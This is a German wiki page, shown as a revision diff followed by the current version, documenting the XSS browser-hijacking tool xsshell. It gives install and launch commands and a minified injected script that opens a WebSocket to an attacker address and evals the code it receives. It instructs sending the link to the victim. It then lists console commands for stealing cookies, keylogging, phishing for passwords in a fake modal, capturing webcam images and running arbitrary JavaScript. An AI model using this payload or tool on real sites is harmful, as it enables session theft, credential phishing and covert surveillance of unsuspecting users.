Xsshell: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 46: | Zeile 46: | ||
cookies: | cookies: | ||
====== xsshell ====== | ====== xsshell ====== | ||
| − | + | * listening for sockets on :port, at url path: /s | |
| − | + | * starting console | |
| − | + | * type \? to list available commands | |
| − | + | * xsshell > \? | |
| − | + | * xsshell > \help \? \h: list available commands | |
| − | + | * xsshell > \alert: send an alert message to the target set usage: \alert ALERT_MESSAGE | |
| − | + | * xsshell > \cs: get the current cookies from the target set's current page and any cookie updates. | |
| − | + | * xsshell > \ct: crash the target set's tab | |
| − | + | * xsshell > \emd: return a list of media devices accessible to the target set's browser | |
| − | + | * xsshell > \ex: print out the client exploit javascript | |
| − | + | * xsshell > \exm: print out the minified version of the client exploit javascript | |
| − | + | * xsshell > \gi: download all images on the target set's page. | |
| − | + | * xsshell > \kl: start a keylogger on the target set | |
| − | + | * xsshell > \ll: list out any links found on the target set's currently open page | |
| − | + | * xsshell > \pfl: open a modal on the target set's page prompting them for a username and password | |
| − | + | * xsshell > \ps: print out socket info for all actively connected websockets | |
| − | + | * xsshell > \q: exit this program | |
| − | + | * xsshell > \sf: send a javascript file to the target set and execute it. | |
| − | + | * xsshell > \sfl: resend the last file that was sent using \sf, includes any new changes to the file | |
| − | + | * xsshell > \src: get the target set's currently rendered page source | |
| − | + | * xsshell > \st: set the websockets to target. one or more targets can be set with the following methods: | |
| − | * xsshell > 8 -target a single websocket connection belonging to that id number | + | * xsshell > 8 -target a single websocket connection belonging to that id number |
| − | * xsshell > 1,2,8,10 -targets all websocket IDs in the comma separated list | + | * xsshell > 1,2,8,10 -targets all websocket IDs in the comma separated list |
| − | + | * xsshell > \wcs: attempt to take a snapshot from the target set's webcam, if one is available. images will be stored in DOWNLOAD_DIR. | |
| − | |||
| − | + | * xsshell > \xhr: send an xhr request from the target set's current page | |
| − | + | * xsshell > usage: \xhr HTTP_METHOD FULL_URL [CONTENT_HEADER] [POST_BODY] | |
=Links= | =Links= | ||
*https://github.com/raz-varren/xsshell | *https://github.com/raz-varren/xsshell | ||
Version vom 28. Juli 2021, 13:04 Uhr
git clone
- sudo apt-get install go
- go get github.com/raz-varren/xsshell
- go install github.com/raz-varren/xsshell
start
- ./xsshell -host 127.0.0.1 -port 4444
xsshell -h Usage of xsshell:
-cert string ssl cert file -host string websocket listen address -key string ssl key file -log string specify a log file to log all console communication -path string websocket connection path (default "/s") -port string websocket listen port (default "8234") -servdir string specify a directory to serve files from. a file server will not be started if no directory is specified -servpath string specify the base url path that you want to serve files from (default "/static/") -wrkdir string working directory that will be used as the relative root path for any commands requiring user provided file paths
Payload
- Payload muss ins Eingabefeld
- Generierter Link wird zum Opfer geschickt
JS Script :
- <script>(function(){function e(a,b){return function(){return eval(a)}.call(b)}var d=new WebSocket("ws://10.82.70.52:4444/s"),f=function(a){this.send=function(b,c){d.send((c?"z":"")+a+b)}};d.onmessage=function(a){a=a.data;var b=new f(a.slice(0,8));try{e(a.slice(8),b)}catch(c){b.send(c,!0)}}})();</script>
Die Shell
start socket: 1, header: AqHFTtA
socket connected: 1
user agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 page url: http://127.0.0.1/xss.php?msg=?
referrer: http://127.0.0.1/xss.php?msg=? cookies:
xsshell
- listening for sockets on :port, at url path: /s
- starting console
- type \? to list available commands
- xsshell > \?
- xsshell > \help \? \h: list available commands
- xsshell > \alert: send an alert message to the target set usage: \alert ALERT_MESSAGE
- xsshell > \cs: get the current cookies from the target set's current page and any cookie updates.
- xsshell > \ct: crash the target set's tab
- xsshell > \emd: return a list of media devices accessible to the target set's browser
- xsshell > \ex: print out the client exploit javascript
- xsshell > \exm: print out the minified version of the client exploit javascript
- xsshell > \gi: download all images on the target set's page.
- xsshell > \kl: start a keylogger on the target set
- xsshell > \ll: list out any links found on the target set's currently open page
- xsshell > \pfl: open a modal on the target set's page prompting them for a username and password
- xsshell > \ps: print out socket info for all actively connected websockets
- xsshell > \q: exit this program
- xsshell > \sf: send a javascript file to the target set and execute it.
- xsshell > \sfl: resend the last file that was sent using \sf, includes any new changes to the file
- xsshell > \src: get the target set's currently rendered page source
- xsshell > \st: set the websockets to target. one or more targets can be set with the following methods:
* xsshell > 8 -target a single websocket connection belonging to that id number
* xsshell > 1,2,8,10 -targets all websocket IDs in the comma separated list
- xsshell > \wcs: attempt to take a snapshot from the target set's webcam, if one is available. images will be stored in DOWNLOAD_DIR.
- xsshell > \xhr: send an xhr request from the target set's current page
* xsshell > usage: \xhr HTTP_METHOD FULL_URL [CONTENT_HEADER] [POST_BODY]